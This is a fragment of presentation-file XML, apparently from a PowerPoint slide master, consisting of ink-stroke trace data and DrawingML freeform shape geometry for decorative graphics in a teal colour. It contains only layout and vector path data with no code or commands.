2 0,-1 0 684,-3 0 0,-2 1 0,0 2 0,3 1 0,-4-2 0,2 1 0,-2 1-243,3 5 1,-4-1-1,1 1 1,3 3 242,0 2 0,4 2 0,-6-1 0,6 3 0,-5-1 0,-2 0 0,0 1 0,2 2-281,-2 1 0,2 3 0,-1 1 0,4 1 281</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">7766 0 9274,'-27'3'0,"-35"5"0,-1 0 0,1-1 0,1 1 0,1-1-77,-2-1 0,2 0 1,0-1-1,1 0 1,-1 1-1,0 0 1,-1 0-1,-2 2 77,-1 0 0,-2 2 0,-2 0 0,-1 1 0,0 0 0,2 0 0,1-1 0,2 0 0,4-2-40,-7 0 1,3-1 0,3-1-1,1 0 1,0 1 0,0 0 39,2 3 0,0 0 0,0 1 0,1-1 0,1 0 0,3-1 105,-12 0 0,4-1 0,1-1 0,-2 2-105,9 0 0,-1 1 0,-1 0 0,2-1 0,2 0 0,-1-1 0,4-1 0,-2 0 0,-3 2 0,-8 1 0,-4 2 0,-3 0 0,2 0 0,3-1 0,1-2 0,3 0 0,1-1 0,-2 0 0,5 1 0,-1-1 0,-1 1 0,2-1 0,5 0 320,-6 1 1,4-1-1,0 0-320,2-3 0,0-1 0,2 1 1006,-14 4 1,2 0-1007,-1-3 0,4-1 1610,18 1 0,2-1-1610,-8 0 0,2 0 0,-17 5 0,22-5 0,0 0 0,-26 4 3657,1 1-3657,13-1 0,1-4 0,6-1 0,-15-4 0,16 0 2577,-9 0-2577,23 0 1815,-3 0-1815,3 0 1050,1 0-1050,-4 0 437,8 0-437,-3 0 0,4 0 0,0 0 0,3 3 0,-2-2 0,7 5 0,-7-6 0,6 3 0,-6 1 0,3-4 0,-4 4 0,-1-4 0,1 0 0,0 0 0,0 0 0,0 0 0,-10 0 0,3 0 0,-8 0 0,4 0 0,-24 4 0,14 1 0,9-1 0,-1 1 0,-15 4 0,-13 5-791,6 1 791,22-6 0,1 1 0,-23 9 0,23-9 0,-1 0 0,3 0 0,0-1 0,-3 1 0,0 0-164,-18 5 164,-6 3 0,13-4 0,-10 0 0,22-5 0,-2-1 0,-27 9 0,11-4 0,12 2 0,29-9 783,-3 8-783,8-3 172,-2 10-172,4-3 0,-2 4 0,5 5 0,-6-4 0,7 8 0,-7-8 0,6 4 0,-6-1 0,3-3 0,0 8 0,-3-3 0,2 4 0,1 0 0,-7 0 0,6 0 0,-3 0 0,0 0 0,4 0 0,-1-4 0,-2 3 0,6-4 0,-2 10 0,3 1 0,0 11 0,0 7-761,4 8 761,3-27 0,1 2 0,3 4 0,1 0 0,0-10 0,2 2 0,8 19 0,1-2 0,-1-5 0,-1-4 0,0-1 0,1 3 0,1 0 0,-2-6 0,-6-13 0,-1-8 0,0-3 0,3-5 761,2-3-761,3 0 0,4 1 0,2-1 0,4 1 0,5 4 0,1-2 0,0 2 0,4 0 0,-4-2 0,20 2 0,-16-7 0,9-1 0,-24-4 0,-4 0 0,-3 0 0,-9 0 0,1 0 0,-6 0 0,-3 2 0,0 2 0,0 1 0,-3 1 0,6 1 0,0 8 0,2-4 0,1 9 0,-2-10 0,-4 2 0,3-5 0,-6 3 0,3-4 0,0 0 0,-3 0 0,3 0 0,-3 0 0,3-3 0,0 2 0,3-2 0,0 3 0,1 8 0,3 1 0,6 12 0,5 2 0,9 6 0,-3 0 0,8 5 0,-8-4 0,4 4 0,-5-6 0,-5-5 0,-2-5 0,-8-6 0,-1-8 0,-4-1 0,-3-6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A33B4-AB54-B145-AE3C-0B75F96167AD}" type="datetimeFigureOut">
              <a:rPr lang="en-NL" smtClean="0"/>
              <a:t>21/08/2020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B7370-DC47-B941-830D-3358E336D0F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066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696B5C-12A0-4042-B4D0-BD3B9A4F58C6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3513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capgemini.com/optimize-your-business-and-it-operations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E3642-931F-1643-90D8-92BB7EF621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596605-0D28-B54A-8F93-DD5580C2D4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768D54-9260-7743-AB9F-B5A7D4EF7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4794C-D981-0A41-8125-3649756EA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DA909-0321-A348-90FC-FFFB45166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35530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87FA3-6162-544C-A993-675239B08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533B4B-E195-B749-B3E1-C5104CC6FB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B82F79-F5DD-BC47-9ED2-5BD2E6AD7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1C0163-4923-0042-BA41-4876B1F11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5621B0-F7E3-3F40-9D0D-1805150F5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69219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EF7506-8E18-444D-925C-6B642C571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C85791-5FC4-3048-8D8F-5FC40FFCB7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E97D45-6280-4B4A-9C8D-FA5DE22C5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E4AF02-EC21-7346-AEF6-1747F0825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FE2127-723A-6B48-B1C0-C0876FB64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71206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-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 41"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="14104878" flipV="1">
            <a:off x="11461096" y="5861891"/>
            <a:ext cx="393324" cy="1065117"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 35477 w 2953050"/>
              <a:gd name="connsiteY0" fmla="*/ 7996828 h 7996828"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 2953050"/>
              <a:gd name="connsiteY1" fmla="*/ 7946009 h 7996828"/>
              <a:gd name="connsiteX2" fmla="*/ 152805 w 2953050"/>
              <a:gd name="connsiteY2" fmla="*/ 7894212 h 7996828"/>
              <a:gd name="connsiteX3" fmla="*/ 2897817 w 2953050"/>
              <a:gd name="connsiteY3" fmla="*/ 3972624 h 7996828"/>
              <a:gd name="connsiteX4" fmla="*/ 152805 w 2953050"/>
              <a:gd name="connsiteY4" fmla="*/ 46481 h 7996828"/>
              <a:gd name="connsiteX5" fmla="*/ 137646 w 2953050"/>
              <a:gd name="connsiteY5" fmla="*/ 41341 h 7996828"/>
              <a:gd name="connsiteX6" fmla="*/ 196864 w 2953050"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 7996828"/>
              <a:gd name="connsiteX7" fmla="*/ 364669 w 2953050"/>
              <a:gd name="connsiteY7" fmla="*/ 66360 h 7996828"/>
              <a:gd name="connsiteX8" fmla="*/ 2953050 w 2953050"/>
              <a:gd name="connsiteY8" fmla="*/ 3972624 h 7996828"/>
              <a:gd name="connsiteX9" fmla="*/ 172482 w 2953050"/>
              <a:gd name="connsiteY9" fmla="*/ 7950334 h 7996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53050" h="7996828">
                <a:moveTo>
                  <a:pt x="35477" y="7996828"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7946009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152805" y="7894212"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1751633" y="7307844"/>
                  <a:pt x="2897817" y="5770889"/>
                  <a:pt x="2897817" y="3972624"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2897817" y="2170763"/>
                  <a:pt x="1751634" y="633020"/>
                  <a:pt x="152805" y="46481"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="137646" y="41341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196864" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364669" y="66360"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1883781" y="710715"/>
                  <a:pt x="2953050" y="2218668"/>
                  <a:pt x="2953050" y="3972624"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2953050" y="5796065"/>
                  <a:pt x="1792820" y="7355385"/>
                  <a:pt x="172482" y="7950334"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="01D1D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4" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2346570" flipV="1">
            <a:off x="11524380" y="6050280"/>
            <a:ext cx="327745" cy="621192"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 505 w 579"/>
              <a:gd name="T1" fmla="*/ 1098 h 1098"/>
              <a:gd name="T2" fmla="*/ 0 w 579"/>
              <a:gd name="T3" fmla="*/ 283 h 1098"/>
              <a:gd name="T4" fmla="*/ 46 w 579"/>
              <a:gd name="T5" fmla="*/ 0 h 1098"/>
              <a:gd name="T6" fmla="*/ 203 w 579"/>
              <a:gd name="T7" fmla="*/ 51 h 1098"/>
              <a:gd name="T8" fmla="*/ 166 w 579"/>
              <a:gd name="T9" fmla="*/ 283 h 1098"/>
              <a:gd name="T10" fmla="*/ 579 w 579"/>
              <a:gd name="T11" fmla="*/ 950 h 1098"/>
              <a:gd name="T12" fmla="*/ 505 w 579"/>
              <a:gd name="T13" fmla="*/ 1098 h 10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79" h="1098">
                <a:moveTo>
                  <a:pt x="505" y="1098"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="194" y="943"/>
                  <a:pt x="0" y="631"/>
                  <a:pt x="0" y="283"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="187"/>
                  <a:pt x="16" y="91"/>
                  <a:pt x="46" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="203" y="51"/>
                  <a:pt x="203" y="51"/>
                  <a:pt x="203" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178" y="126"/>
                  <a:pt x="166" y="204"/>
                  <a:pt x="166" y="283"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166" y="568"/>
                  <a:pt x="324" y="823"/>
                  <a:pt x="579" y="950"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="505" y="1098"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="01D1D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5" name="Freeform 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="11492589" y="6320725"/>
            <a:ext cx="699411" cy="535949"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 285201 w 5251138"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4023875"/>
              <a:gd name="connsiteX1" fmla="*/ 5251138 w 5251138"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4023875"/>
              <a:gd name="connsiteX2" fmla="*/ 5251138 w 5251138"/>
              <a:gd name="connsiteY2" fmla="*/ 2573806 h 4023875"/>
              <a:gd name="connsiteX3" fmla="*/ 5119892 w 5251138"/>
              <a:gd name="connsiteY3" fmla="*/ 2789842 h 4023875"/>
              <a:gd name="connsiteX4" fmla="*/ 2798955 w 5251138"/>
              <a:gd name="connsiteY4" fmla="*/ 4023875 h 4023875"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 5251138"/>
              <a:gd name="connsiteY5" fmla="*/ 1224920 h 4023875"/>
              <a:gd name="connsiteX6" fmla="*/ 219956 w 5251138"/>
              <a:gd name="connsiteY6" fmla="*/ 135441 h 4023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51138" h="4023875">
                <a:moveTo>
                  <a:pt x="285201" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5251138" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5251138" y="2573806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5119892" y="2789842"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4616900" y="3534369"/>
                  <a:pt x="3765093" y="4023875"/>
                  <a:pt x="2798955" y="4023875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1253135" y="4023875"/>
                  <a:pt x="0" y="2770740"/>
                  <a:pt x="0" y="1224920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="838465"/>
                  <a:pt x="78321" y="470303"/>
                  <a:pt x="219956" y="135441"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="381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sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Freeform 45"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2346570" flipV="1">
            <a:off x="11368976" y="6579490"/>
            <a:ext cx="204038" cy="241456"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1531902 w 1531902"/>
              <a:gd name="connsiteY0" fmla="*/ 34890 h 1812835"/>
              <a:gd name="connsiteX1" fmla="*/ 1400063 w 1531902"/>
              <a:gd name="connsiteY1" fmla="*/ 108760 h 1812835"/>
              <a:gd name="connsiteX2" fmla="*/ 50978 w 1531902"/>
              <a:gd name="connsiteY2" fmla="*/ 1812835 h 1812835"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1531902"/>
              <a:gd name="connsiteY3" fmla="*/ 1795840 h 1812835"/>
              <a:gd name="connsiteX4" fmla="*/ 1373252 w 1531902"/>
              <a:gd name="connsiteY4" fmla="*/ 64739 h 1812835"/>
              <a:gd name="connsiteX5" fmla="*/ 1488984 w 1531902"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1812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1902" h="1812835">
                <a:moveTo>
                  <a:pt x="1531902" y="34890"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1400063" y="108760"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="778316" y="489420"/>
                  <a:pt x="292329" y="1083911"/>
                  <a:pt x="50978" y="1812835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1795840"/>
                  <a:pt x="0" y="1795840"/>
                  <a:pt x="0" y="1795840"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="246130" y="1054966"/>
                  <a:pt x="740929" y="451214"/>
                  <a:pt x="1373252" y="64739"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1488984" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="01D1D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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11595850" y="6412484"/>
            <a:ext cx="458427" cy="279655"/>
            <a:chOff x="11170028" y="6095205"/>
            <a:chExt cx="785875" cy="479408"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="01D1D0"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Freeform 17"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11924377" y="6187033"/>
              <a:ext cx="12082" cy="50970"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 21 w 32"/>
                <a:gd name="T1" fmla="*/ 0 h 135"/>
                <a:gd name="T2" fmla="*/ 32 w 32"/>
                <a:gd name="T3" fmla="*/ 3 h 135"/>
                <a:gd name="T4" fmla="*/ 13 w 32"/>
                <a:gd name="T5" fmla="*/ 135 h 135"/>
                <a:gd name="T6" fmla="*/ 0 w 32"/>
                <a:gd name="T7" fmla="*/ 132 h 135"/>
                <a:gd name="T8" fmla="*/ 21 w 3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35">
                  <a:moveTo>
                    <a:pt x="21" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21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18"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11890247" y="6164938"/>
              <a:ext cx="16990" cy="49460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 45"/>
                <a:gd name="T1" fmla="*/ 0 h 131"/>
                <a:gd name="T2" fmla="*/ 45 w 45"/>
                <a:gd name="T3" fmla="*/ 2 h 131"/>
                <a:gd name="T4" fmla="*/ 13 w 45"/>
                <a:gd name="T5" fmla="*/ 131 h 131"/>
                <a:gd name="T6" fmla="*/ 0 w 45"/>
                <a:gd name="T7" fmla="*/ 129 h 131"/>
                <a:gd name="T8" fmla="*/ 32 w 45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31">
                  <a:moveTo>
                    <a:pt x="32" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32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19"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11855041" y="6145510"/>
              <a:ext cx="21143" cy="49460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 43 w 56"/>
                <a:gd name="T1" fmla="*/ 0 h 131"/>
                <a:gd name="T2" fmla="*/ 56 w 56"/>
                <a:gd name="T3" fmla="*/ 5 h 131"/>
                <a:gd name="T4" fmla="*/ 14 w 56"/>
                <a:gd name="T5" fmla="*/ 131 h 131"/>
                <a:gd name="T6" fmla="*/ 0 w 56"/>
                <a:gd name="T7" fmla="*/ 126 h 131"/>
                <a:gd name="T8" fmla="*/ 43 w 56"/>
                <a:gd name="T9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131">
                  <a:moveTo>
                    <a:pt x="43" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43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20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11818640" y="6129175"/>
              <a:ext cx="23786" cy="47950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 52 w 63"/>
                <a:gd name="T1" fmla="*/ 0 h 127"/>
                <a:gd name="T2" fmla="*/ 63 w 63"/>
                <a:gd name="T3" fmla="*/ 5 h 127"/>
                <a:gd name="T4" fmla="*/ 10 w 63"/>
                <a:gd name="T5" fmla="*/ 127 h 127"/>
                <a:gd name="T6" fmla="*/ 0 w 63"/>
                <a:gd name="T7" fmla="*/ 121 h 127"/>
                <a:gd name="T8" fmla="*/ 52 w 63"/>
                <a:gd name="T9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27">
                  <a:moveTo>
                    <a:pt x="52" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="63" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52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21"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11781040" y="6115568"/>
              <a:ext cx="27561" cy="46817"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 73"/>
                <a:gd name="T1" fmla="*/ 0 h 124"/>
                <a:gd name="T2" fmla="*/ 73 w 73"/>
                <a:gd name="T3" fmla="*/ 8 h 124"/>
                <a:gd name="T4" fmla="*/ 10 w 73"/>
                <a:gd name="T5" fmla="*/ 124 h 124"/>
                <a:gd name="T6" fmla="*/ 0 w 73"/>
                <a:gd name="T7" fmla="*/ 119 h 124"/>
                <a:gd name="T8" fmla="*/ 63 w 73"/>
                <a:gd name="T9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24">
                  <a:moveTo>
                    <a:pt x="63" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63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22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11742047" y="6105624"/>
              <a:ext cx="30960" cy="44929"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 71 w 82"/>
                <a:gd name="T1" fmla="*/ 0 h 119"/>
                <a:gd name="T2" fmla="*/ 82 w 82"/>
                <a:gd name="T3" fmla="*/ 8 h 119"/>
                <a:gd name="T4" fmla="*/ 10 w 82"/>
                <a:gd name="T5" fmla="*/ 119 h 119"/>
                <a:gd name="T6" fmla="*/ 0 w 82"/>
                <a:gd name="T7" fmla="*/ 111 h 119"/>
                <a:gd name="T8" fmla="*/ 71 w 82"/>
                <a:gd name="T9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71" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71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23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11701680" y="6099301"/>
              <a:ext cx="34735" cy="42664"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 82 w 92"/>
                <a:gd name="T1" fmla="*/ 0 h 113"/>
                <a:gd name="T2" fmla="*/ 92 w 92"/>
                <a:gd name="T3" fmla="*/ 7 h 113"/>
                <a:gd name="T4" fmla="*/ 8 w 92"/>
                <a:gd name="T5" fmla="*/ 113 h 113"/>
                <a:gd name="T6" fmla="*/ 0 w 92"/>
                <a:gd name="T7" fmla="*/ 105 h 113"/>
                <a:gd name="T8" fmla="*/ 82 w 92"/>
                <a:gd name="T9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113">
                  <a:moveTo>
                    <a:pt x="82" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="92" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82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4"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11661995" y="6095604"/>
              <a:ext cx="37756" cy="40776"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 89 w 100"/>
                <a:gd name="T1" fmla="*/ 0 h 108"/>
                <a:gd name="T2" fmla="*/ 100 w 100"/>
                <a:gd name="T3" fmla="*/ 8 h 108"/>
                <a:gd name="T4" fmla="*/ 8 w 100"/>
                <a:gd name="T5" fmla="*/ 108 h 108"/>
                <a:gd name="T6" fmla="*/ 0 w 100"/>
                <a:gd name="T7" fmla="*/ 98 h 108"/>
                <a:gd name="T8" fmla="*/ 89 w 100"/>
                <a:gd name="T9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108">
                  <a:moveTo>
                    <a:pt x="89" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="100" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89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25"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11622423" y="6096338"/>
              <a:ext cx="40021" cy="37756"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 106"/>
                <a:gd name="T1" fmla="*/ 0 h 100"/>
                <a:gd name="T2" fmla="*/ 106 w 106"/>
                <a:gd name="T3" fmla="*/ 10 h 100"/>
                <a:gd name="T4" fmla="*/ 8 w 106"/>
                <a:gd name="T5" fmla="*/ 100 h 100"/>
                <a:gd name="T6" fmla="*/ 0 w 106"/>
                <a:gd name="T7" fmla="*/ 89 h 100"/>
                <a:gd name="T8" fmla="*/ 98 w 106"/>
                <a:gd name="T9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0">
                  <a:moveTo>
                    <a:pt x="98" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98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Freeform 26"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11582322" y="6099008"/>
              <a:ext cx="42664" cy="35113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 105 w 113"/>
                <a:gd name="T1" fmla="*/ 0 h 93"/>
                <a:gd name="T2" fmla="*/ 113 w 113"/>
                <a:gd name="T3" fmla="*/ 11 h 93"/>
                <a:gd name="T4" fmla="*/ 7 w 113"/>
                <a:gd name="T5" fmla="*/ 93 h 93"/>
                <a:gd name="T6" fmla="*/ 0 w 113"/>
                <a:gd name="T7" fmla="*/ 82 h 93"/>
                <a:gd name="T8" fmla="*/ 105 w 113"/>
                <a:gd name="T9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93">
                  <a:moveTo>
                    <a:pt x="105" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105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27"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11542927" y="6106859"/>
              <a:ext cx="44929" cy="30960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 119"/>
                <a:gd name="T1" fmla="*/ 0 h 82"/>
                <a:gd name="T2" fmla="*/ 119 w 119"/>
                <a:gd name="T3" fmla="*/ 11 h 82"/>
                <a:gd name="T4" fmla="*/ 8 w 119"/>
                <a:gd name="T5" fmla="*/ 82 h 82"/>
                <a:gd name="T6" fmla="*/ 0 w 119"/>
                <a:gd name="T7" fmla="*/ 71 h 82"/>
                <a:gd name="T8" fmla="*/ 111 w 119"/>
                <a:gd name="T9" fmla="*/ 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" h="82">
                  <a:moveTo>
                    <a:pt x="111" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="119" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111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28"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="13617161" flipV="1">
              <a:off x="11504172" y="6116564"/>
              <a:ext cx="46817" cy="27939"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 116 w 124"/>
                <a:gd name="T1" fmla="*/ 0 h 74"/>
                <a:gd name="T2" fmla="*/ 124 w 124"/>
                <a:gd name="T3" fmla="*/ 11 h 74"/>
                <a:gd name="T4" fmla="*/ 5 w 124"/>
                <a:gd name="T5" fmla="*/ 74 h 74"/>
                <a:gd name="T6" fmla="*/ 0 w 124"/>
                <a:gd name="T7" fmla="*/ 64 h 74"/>
                <a:gd name="T8" fmla="*/ 116 w 124"/>
                <a:gd name="T9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4">
